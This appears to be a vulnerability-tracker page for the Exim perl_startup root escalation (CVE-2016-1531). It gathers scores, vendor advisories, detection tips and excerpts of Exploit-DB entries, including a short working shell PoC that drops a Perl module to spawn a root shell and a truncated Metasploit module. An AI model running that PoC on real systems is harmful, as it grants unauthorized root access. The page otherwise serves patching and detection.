CVE-2016-1531
published 2016-04-07CVE-2016-1531: Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.
PriorityP345high7CVSS 3.0
AVLACHPRLUINSUCHIHAH
EXPLOIT
EPSS
5.90%
92.3th percentile
Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | exim4 | < exim4 4.86.2-1 (bookworm) | exim4 4.86.2-1 (bookworm) |
| exim | exim | <= 4.86 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Alert on creation of /tmp/root.pm, which is the malicious Perl module dropped by the shell-script PoC exploit for CVE-2016-1531. ↗
- →Monitor for the PERL5DB environment variable being set on exim process invocations, particularly containing 'exec' — this is the Metasploit technique for arbitrary command execution. ↗
- →Check whether the Exim binary is setuid root and compiled with Perl support; both conditions are required for exploitation. ↗
- →Verify Exim configuration for the presence of 'perl_startup' directive; exploitation requires this option to be set in /etc/exim/exim.conf or /etc/exim4/exim.conf. ↗
- →Audit Exim Perl support at runtime using 'exim -bV -v | grep -i Perl'; presence of 'Perl' in support flags indicates the binary is vulnerable if perl_startup is configured. ↗
- ·Exploitation requires 'perl_startup' to be defined in the Exim main configuration file. Default configurations without this directive are NOT vulnerable. ↗
- ·The file referenced by perl_startup does not need to exist on disk for the vulnerability to be exploitable — only the path must be specified in the config. ↗
- ·The Ubuntu fix introduces full execution environment cleaning on Exim startup (including subprocesses/transports). This may break existing installations; use the new 'keep_environment' and 'add_environment' config options to adjust. ↗
CVSS provenance
nvdv3.07.0HIGHCVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.9MEDIUMAV:L/AC:M/Au:N/C:C/I:C/A:C
osv7.0HIGH
vendor_debian7.0HIGH
vendor_redhat7.0HIGH
vendor_ubuntu4.6MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qqgw-xrxj-r5fc: Exim before 4
ghsa_unreviewed·2022-05-17
CVE-2016-1531 [HIGH] GHSA-qqgw-xrxj-r5fc: Exim before 4
Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.
OSV
CVE-2016-1531: Exim before 4
osv·2016-04-07·CVSS 7.0
CVE-2016-1531 [HIGH] CVE-2016-1531: Exim before 4
Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.
OSV
exim4 vulnerabilities
osv·2016-03-15·CVSS 4.6
[MEDIUM] exim4 vulnerabilities
exim4 vulnerabilities
It was discovered that Exim incorrectly filtered environment variables when
used with the perl_startup configuration option. If the perl_startup option
was enabled, a local attacker could use this issue to escalate their
privileges to the root user. This issue has been fixed by having Exim clean
the complete execution environment by default on startup, including any
subprocesses such as transports that call other programs. This change in
behaviour may break existing installations and can be adjusted by using two
new configuration options, keep_environment and add_environment.
(CVE-2016-1531)
Patrick William discovered that Exim incorrectly expanded mathematical
comparisons twice. A local attacker could possibly use this issue to
perform arbitrary file operations as
Ubuntu
Exim vulnerabilities
vendor_ubuntu·2016-03-15·CVSS 4.6
CVE-2014-2972 [MEDIUM] Exim vulnerabilities
Title: Exim vulnerabilities
Summary: Several security issues were fixed in Exim.
It was discovered that Exim incorrectly filtered environment variables when
used with the perl_startup configuration option. If the perl_startup option
was enabled, a local attacker could use this issue to escalate their
privileges to the root user. This issue has been fixed by having Exim clean
the complete execution environment by default on startup, including any
subprocesses such as transports that call other programs. This change in
behaviour may break existing installations and can be adjusted by using two
new configuration options, keep_environment and add_environment.
(CVE-2016-1531)
Patrick William discovered that Exim incorrectly expanded mathematical
comparisons twice. A local attacker could poss
Red Hat
exim: local root privilege escalation for configurations with perl_startup
vendor_redhat·2016-03-02·CVSS 7.0
CVE-2016-1531 [HIGH] CWE-426 exim: local root privilege escalation for configurations with perl_startup
exim: local root privilege escalation for configurations with perl_startup
Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.
Statement: This issue affects the version of exim as shipped with Red Hat Enterprise Linux 4 and 5. However, the default configurations are not affected, as they do not use 'perl_startup' directive.
Red Hat Enterprise Linux 4 is now in Extended Life Cycle phase of the support and maintenance life cycle, and Red Hat Enterprise Linux 5 is now in Production 3 Phase of the support and maintenance life cycle. This issue is not currently planned to be addressed in future updates. For additional information, refer to the Red Hat Enterprise Linux Life Cycle: https://access.redhat.com/support/policy/updates/
Debian
CVE-2016-1531: exim4 - Exim before 4.86.2, when installed setuid root, allows local users to gain privi...
vendor_debian·2016·CVSS 7.0
CVE-2016-1531 [HIGH] CVE-2016-1531: exim4 - Exim before 4.86.2, when installed setuid root, allows local users to gain privi...
Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.
Scope: local
bookworm: resolved (fixed in 4.86.2-1)
bullseye: resolved (fixed in 4.86.2-1)
forky: resolved (fixed in 4.86.2-1)
sid: resolved (fixed in 4.86.2-1)
trixie: resolved (fixed in 4.86.2-1)
No detection rules found.
Exploit-DB
Exim - 'perl_startup' Local Privilege Escalation (Metasploit)
exploitdb·2016-04-15·CVSS 7.0
CVE-2016-1531 [HIGH] Exim - 'perl_startup' Local Privilege Escalation (Metasploit)
Exim - 'perl_startup' Local Privilege Escalation (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Exim "perl_startup" Privilege Escalation',
'Description' => %q{
This module exploits a Perl injection vulnerability in Exim [
'Dawid Golunski', # Vulnerability discovery
'wvu' # Metasploit module
],
'References' => [
%w{CVE 2016-1531},
%w{EDB 39549},
%w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt}
],
'DisclosureDate' => 'Mar 10 2016',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => %w{shell meterpreter},
'Privileged' => true,
'Payload' => {
'BadChars' => "\x22\x27", # " and '
'Compat' => {
'PayloadType' => 'cmd cmd_ba
Exploit-DB
Exim < 4.86.2 - Local Privilege Escalation
exploitdb·2016-03-10
CVE-2016-1531 Exim < 4.86.2 - Local Privilege Escalation
Exim exim
[dawid@centos7 ~]$ ls -l /usr/sbin/exim
-rwsr-xr-x. 1 root root 1222416 Dec 7 2015 /usr/sbin/exim
Normally, when exim sendmail interface starts up, it drops its root
privileges before giving control to the user (i.e entering mail contents for
sending etc), however an attacker can make use of the following command line
parameter which is available to all users:
-ps This option applies when an embedded Perl interpreter is linked with
Exim. It overrides the setting of the perl_at_start option, forcing the
starting of the interpreter to occur as soon as Exim is started.
As we can see from the documentation at:
http://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html
the perl_at_start option does the following:
"Setting perl_at_start (a boolean option) i
Exploit-DB
Exim 4.84-3 - Local Privilege Escalation
exploitdb·2016-03-09·CVSS 7.0
CVE-2016-1531 [HIGH] Exim 4.84-3 - Local Privilege Escalation
Exim 4.84-3 - Local Privilege Escalation
---
#!/bin/sh
# CVE-2016-1531 exim /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
Bugzilla
CVE-2016-1531 exim: Local privilege escalation for set-uid root exim when using perl_startup [epel-all]
bugzilla·2016-03-03·CVSS 7.0
CVE-2016-1531 [HIGH] CVE-2016-1531 exim: Local privilege escalation for set-uid root exim when using perl_startup [epel-all]
CVE-2016-1531 exim: Local privilege escalation for set-uid root exim when using perl_startup [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects
Bugzilla
CVE-2016-1531 exim: local root privilege escalation for configurations with perl_startup
bugzilla·2016-03-03·CVSS 7.0
CVE-2016-1531 [HIGH] CVE-2016-1531 exim: local root privilege escalation for configurations with perl_startup
CVE-2016-1531 exim: local root privilege escalation for configurations with perl_startup
Privilege escalation vulnerability was found in all installations having Exim set-uid root and using 'perl_startup'. Any user who can start an instance of Exim can gain root privileges.
https://lists.exim.org/lurker/message/20160302.191005.a72d8433.en.html
Discussion:
Created exim tracking bugs for this issue:
Affects: fedora-all [bug 1314294]
Affects: epel-all [bug 1314295]
---
Related upstream commits:
http://git.exim.org/exim.git/commitdiff/43ba2742c700d625dcdcdaf7bbadc2f72776854a
http://git.exim.org/exim.git/commitdiff/677c582e4da6b30f5467964bbd105c111247df25
http://git.exim.org/exim.git/commitdiff/dd90c19962a63fe966e17c75b4a36639302d1e67
External Reference:
http://exim.org/static/doc/CVE
Bugzilla
CVE-2016-1531 exim: Local privilege escalation for set-uid root exim when using perl_startup [fedora-all]
bugzilla·2016-03-03·CVSS 7.0
CVE-2016-1531 [HIGH] CVE-2016-1531 exim: Local privilege escalation for set-uid root exim when using perl_startup [fedora-all]
CVE-2016-1531 exim: Local privilege escalation for set-uid root exim when using perl_startup [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects mul
CTF
LinuxPrivEsc / README
ctf_writeups
LinuxPrivEsc / README
Task 1: Deploy the Vulnerable Debian VM
```
This room is aimed at walking you through a variety of Linux Privilege Escalation techniques. To do this, you must first deploy an intentionally vulnerable Debian VM. This VM was created by Sagi Shahar as part of his local privilege escalation workshop but has been updated by Tib3rius as part of his Linux Privilege Escalation for OSCP and Beyond! course on Udemy. Full explanations of the various techniques used in this room are available there, along with demos and tips for finding privilege escalations in Linux.
Make sure you are connected to the TryHackMe VPN or using the in-browser Kali instance before trying to access the Debian VM!
SSH should be available on port 22. You can login to the "user" account using the following command:
ssh use
http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00026.htmlhttp://packetstormsecurity.com/files/136124/Exim-4.84-3-Local-Root-Privilege-Escalation.htmlhttp://www.debian.org/security/2016/dsa-3517http://www.exim.org/static/doc/CVE-2016-1531.txthttp://www.rapid7.com/db/modules/exploit/unix/local/exim_perl_startuphttp://www.securitytracker.com/id/1035512http://www.ubuntu.com/usn/USN-2933-1https://www.exploit-db.com/exploits/39535/https://www.exploit-db.com/exploits/39549/https://www.exploit-db.com/exploits/39702/http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00026.htmlhttp://packetstormsecurity.com/files/136124/Exim-4.84-3-Local-Root-Privilege-Escalation.htmlhttp://www.debian.org/security/2016/dsa-3517http://www.exim.org/static/doc/CVE-2016-1531.txthttp://www.rapid7.com/db/modules/exploit/unix/local/exim_perl_startuphttp://www.securitytracker.com/id/1035512http://www.ubuntu.com/usn/USN-2933-1https://www.exploit-db.com/exploits/39535/https://www.exploit-db.com/exploits/39549/https://www.exploit-db.com/exploits/39702/
2016-04-07
Published